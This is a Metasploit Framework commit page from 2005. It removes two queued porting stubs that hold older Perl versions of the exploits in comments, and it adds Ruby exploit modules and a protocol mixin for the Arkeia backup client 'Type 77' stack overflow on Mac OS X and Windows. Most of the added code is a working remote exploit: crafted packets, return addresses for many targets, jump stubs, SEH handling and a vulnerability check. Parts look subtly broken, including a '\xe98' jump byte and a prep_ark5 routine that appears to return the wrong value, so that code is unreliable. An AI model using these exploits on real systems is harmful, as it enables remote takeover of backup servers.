github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Code Releases Activity

Arkeia exploits added

Browse Source 
git-svn-id: file:///home/svn/incoming/trunk@3129 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2005-11-26 19:56:03 +00:00
parent a990e20067
commit 40aa62968f
6 changed files with 428 additions and 519 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

238
dev/porting/queue/arkeia_type77_macos.rb
View File

@ -1,238 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '6'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'osx',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::arkeia_type77_macos;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::Arkeia;
my $advanced = { };
my $info =
{
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'ppc' ],
'OS' => [ 'osx'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 617],
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
}),
'Refs' =>
[
['OSVDB', '14011'],
['BID', '12594'],
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
['MIL', '6'],
],
'Targets' =>
[
['Arkeia 5.3.1 Stack Return (boot)', 0xbffff910 ],
],
'Keys' => ['arkeia'],
'DisclosureDate' => 'Feb 18 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
my %info = Pex::Arkeia::ClientInfo($s);
# Give up if we did not get a version response back
if (! $info{'Version'} ) {
$self->PrintLine("[*] Error: ". $info{'Error'});
return $self->CheckCode('Unknown');
}
# Dump out the information returned by the server
$self->PrintLine("[*] System Information");
foreach my $inf (keys %info) {
next if $inf eq 'Error';
$self->PrintLine(" $inf: $info{$inf}");
}
# Throw a warning if they are using the wrong exploit
if ($info{'System'} !~ /Darwin/i) {
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
}
# We are going to assume that they will fix this in the next release
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
$self->PrintLine("[*] This system appears to be vulnerable");
return $self->CheckCode('Confirmed');
}
# This is more than likely not vulnerable...
$self->PrintLine("[*] This version may not be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
# Request has to be big enough to find and small enough
# not to write off the end of the stack. If we write too
# far down, we also smash env[], which causes a crash in
# getenv() before our function returns.
my $poof = Pex::Text::EnglishText(1200);
# Configure the length value of the data in the packet header
substr($head, 6, 2, pack('n', length($poof)));
# Return back to the stack either directly or via system lib
substr($poof, 0, 112, pack('N', $target->[1]) x (112 / 4));
# Huge nop slep followed by the payload
substr($poof, 112, length($shellcode), $shellcode);
$self->PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");
$s->Send($head);
$s->Send($poof);
# Wait a few seconds for the payload to pop...
$s->Recv(-1, 10);
# Call the payload handler if one exists
$self->Handler($s);
return;
}
1;
=end
end
end

280
dev/porting/queue/arkeia_type77_win32.rb
View File

@ -1,280 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Windows platform. This vulnerability affects
all versions up to and including 5.3.3.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '7'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::arkeia_type77_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::Arkeia;
my $advanced = { };
my $info =
{
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32'],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 617],
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Arkeia backup
client for the Windows platform. This vulnerability affects
all versions up to and including 5.3.3.
}),
'Refs' =>
[
['OSVDB', '14011'],
['BID', '12594'],
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
['MIL', '7'],
],
'Targets' =>
[
['Arkeia 5.3.3 and 5.2.27 Windows (All)', 0x004130a2, 5 ], # arkeiad.exe
['Arkeia 5.2.27 and 5.1.19 Windows (All)', 0x00407b9c, 5 ], # arkeiad.exe
['Arkeia 5.3.3 and 5.0.19 Windows (All)', 0x0041d6b9, 5 ], # arkeiad.exe
['Arkeia 5.1.19 and 5.0.19 Windows (All)', 0x00423264, 5 ], # arkeiad.exe
['Arkeia 5.x Windows 2000 English', 0x75022ac4, 5 ], # ws2help.dll
['Arkeia 5.x Windows XP English SP0/SP1', 0x71aa32ad, 5 ], # ws2help.dll
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 5 ], # ws2help.dll
['Arkeia 4.2 Windows 2000 English', 0x75022ac4, 4 ], # ws2help.dll
['Arkeia 4.2 Windows XP English SP0/SP1', 0x71aa32ad, 4 ], # ws2help.dll
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 4 ], # ws2help.dll
['Arkeia 4.2 Windows 2000 German', 0x74fa1887, 4 ], # ws2help.dll
],
'Keys' => ['arkeia'],
'DisclosureDate' => 'Feb 18 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
my %info = Pex::Arkeia::ClientInfo($s);
# Give up if we did not get a version response back
if (! $info{'Version'} ) {
$self->PrintLine("[*] Error: ". $info{'Error'});
return $self->CheckCode('Unknown');
}
# Dump out the information returned by the server
$self->PrintLine("[*] System Information");
foreach my $inf (keys %info) {
next if $inf eq 'Error';
$self->PrintLine(" $inf: $info{$inf}");
}
# Throw a warning if they are using the wrong exploit
if ($info{'System'} !~ /Windows/i) {
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
}
# We are going to assume that they will fix this in the next release
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
$self->PrintLine("[*] This system appears to be vulnerable");
return $self->CheckCode('Confirmed');
}
# This is more than likely not vulnerable...
$self->PrintLine("[*] This version may not be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
my $data;
if ($target->[2] == 5) {
$data = $self->Arkeia5($target->[1], $shellcode);
}
if ($target->[2] == 4) {
$data = $self->Arkeia4($target->[1], $shellcode);
}
# Configure the length value of the data in the packet header
substr($head, 6, 2, pack('n', length($data)));
$self->PrintLine("[*] Sending " .length($data) . " bytes to remote host.");
$s->Send($head);
$s->Send($data);
# Takes a few seconds for the payload to pop (multiple exceptions)
$s->Recv(-1, 10);
return;
}
sub Arkeia5 {
my $self = shift;
my $addr = shift;
my $code = shift;
my $poof = Pex::Text::EnglishText(4096);
# The return address is a pop/pop/ret in the executable or system lib
substr($poof, 1176, 4, pack('V', $addr));
# The pop/pop/ret takes us here, jump back five bytes
substr($poof, 1172, 2, "\xeb\xf9");
# Jump all the way back to our shellcode
substr($poof, 1167, 5, "\xe9".pack('V', -1172));
# Place our shellcode in the beginning of the request
substr($poof, 0, length($code), $code);
return $poof;
}
sub Arkeia4 {
my $self = shift;
my $addr = shift;
my $code = shift;
my $poof = Pex::Text::EnglishText(4096);
# The return address is a pop/pop/ret in the executable or system lib
substr($poof, 100, 4, pack('V', $addr));
# The pop/pop/ret takes us here, jump over the return address
substr($poof, 96, 2, "\xeb\x06");
# Place our shellcode in the beginning of the request
substr($poof, 104, length($code), $code);
return $poof;
}
1;
=end
end
end

3
lib/msf/core/exploit.rb
View File

@ -212,7 +212,8 @@ class Exploit < Msf::Module
require 'msf/core/exploit/http'
require 'msf/core/exploit/dcerpc'
require 'msf/core/exploit/mssql'
require 'msf/core/exploit/arkeia'
#
# Creates an instance of the exploit module. Mad skillz.
#

206
lib/msf/core/exploit/arkeia.rb Normal file
View File

@ -0,0 +1,206 @@
require 'msf/core'
module Msf
###
#
# This module exposes methods for manipulating the Arkeia backup service
#
###
module Exploit::Remote::Arkeia
include Exploit::Remote::Tcp
#
# Creates an instance of a MSSQL exploit module.
#
def initialize(info = {})
super
# Register the options that all FTP exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(617),
], Msf::Exploit::Remote::Arkeia)
self.recv_buff = ''
end
#
# This method dumps some information about the service
#
def arkeia_info
connect
info = { }
resp = ''
# Authenticate1
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x01\x00\x00\x7f\x41\x52\x4b\x41"+
"\x44\x4d\x49\x4e\x00\x72\x6f\x6f"+
"\x74\x00\x72\x6f\x6f\x74\x00\x00"+
"\x00\x34\x2e\x33\x2e\x30\x2d\x31"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
disconnect
return false
end
# Authenticate2
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
"\x32\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
disconnect
return false
end
# SessionSetup1
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
"\x00\x00\x31\x35\x33\x39\x38\x00"+
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
disconnect
return false
end
# Begin the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
"\x00\x32\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
disconnect
return false
end
# Complete the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x32\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
break if not resp
break if resp =~ /VERSION/
}
if (not (resp and resp =~ /VERSION/))
disconnect
return false
end
# Store the version information
mver = resp.match(/IVERSION\x00([^\x00]+)/)
info['Version'] = mver[1] if mver
# Store the hostname information
mver = resp.match(/ISERVNAME\x00([^\x00]+)/)
info['Hostname'] = mver[1] if mver
# Begin the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
"\x4f\x00\x33\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
break if not resp
break if resp[0,2] == "\x00\x43"
}
if (not (resp and resp[0,2] == "\x00\x43"))
disconnect
return info
end
# Complete the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x33\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
break if not (resp and resp.length > 0)
break if resp[0,2] == "\x00\x69"
}
if (not (resp and resp[0,2] == "\x00\x69"))
disconnect
return info
end
# Finally, parse out and store all the parameters
resp.split("TPVALUE\x00").each { |x|
minf = x.match(/^([^\x00]+)\x00PNAME\x00([^\x00]+)/)
if (minf)
info[ minf[2] ] = minf[1]
end
}
disconnect
return info
end
#
# This method reads from the socket and parses out a single
# arkeia response, buffering the rest
#
def arkeia_recv(nsock = self.sock)
if (self.recv_buff.length < 8)
self.recv_buff << (sock.get_once || '')
end
if (self.recv_buff.length < 8)
return false
end
# Read the length header out of the message
dlen = self.recv_buff[6, 2].unpack('n')[0]
# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 8)
return self.recv_buff.slice!(0, dlen + 8)
end
return false
end
attr_accessor :recv_buff
end
end

106
modules/exploits/osx/arkeia/arkeia_type77_macos.rb Normal file
View File

@ -0,0 +1,106 @@
require 'msf/core'
module Msf
class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
include Exploit::Remote::Arkeia
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '6'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Targets' =>
[
[
'Arkeia 5.3.1 Stack Return (boot)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Ret' => 0xbffff910,
},
],
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def check
info = arkeia_info()
if(not (info and info['Version']))
return Exploit::CheckCode::Safe
end
print_status("Arkeia Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (30-k.length))} = #{v}")
}
if (info['System'] !~ /Darwin/)
print_status("This module only supports Mac OS X targets")
return Exploit::CheckCode::Detected
end
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
# Request has to be big enough to find and small enough
# not to write off the end of the stack. If we write too
# far down, we also smash env[], which causes a crash in
# getenv() before our function returns.
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
buf = Rex::Text.rand_text_english(1200, payload_badchars)
# Return back to the stack either directly or via system lib
buf[0, 112] = [target.ret].pack('N') * (112/4)
# Huge nop slep followed by the payload
buf[112, payload.encoded.length] = payload.encoded
head[6, 2] = [buf.length].pack('n')
begin
sock.put(head)
sock.put(buf)
sock.get_once
rescue IOError, EOFError => e
print_status("Exception: #{e.class}:#{e.to_s}")
end
handler
disconnect
end
end
end

114
modules/exploits/windows/arkeia/arkeia_type77_win32.rb Normal file
View File

@ -0,0 +1,114 @@
require 'msf/core'
module Msf
class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
include Exploit::Remote::Arkeia
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Windows platform. This vulnerability affects
all versions up to and including 5.3.3.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '7'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def check
info = arkeia_info()
if(not (info and info['Version']))
return Exploit::CheckCode::Safe
end
print_status("Arkeia Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (30-k.length))} = #{v}")
}
if (info['System'] !~ /Windows/)
print_status("This module only supports Windows targets")
return Exploit::CheckCode::Detected
end
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
head[6, 2] = [data.length].pack('n')
begin
sock.put(head)
sock.put(data)
sock.get_once
rescue IOError, EOFError => e
print_status("Exception: #{e.class}:#{e.to_s}")
end
handler
disconnect
end
def prep_ark5
data = Rex::Text.rand_text_english(4096, payload_badchars)
data[1176, 4] = [target['Rets'][0]].pack('V')
data[1172, 2] = "\xeb\xf9"
data[1167, 5] = "\xe98" + [-1172].pack('V')
data[0, payload.encoded.length] = payload.encoded
end
def prep_ark4
data = Rex::Text.rand_text_english(4096, payload_badchars)
seh = generate_seh_payload( target['Rets'][0] )
data[ 96, seh.length] = seh
end
end
end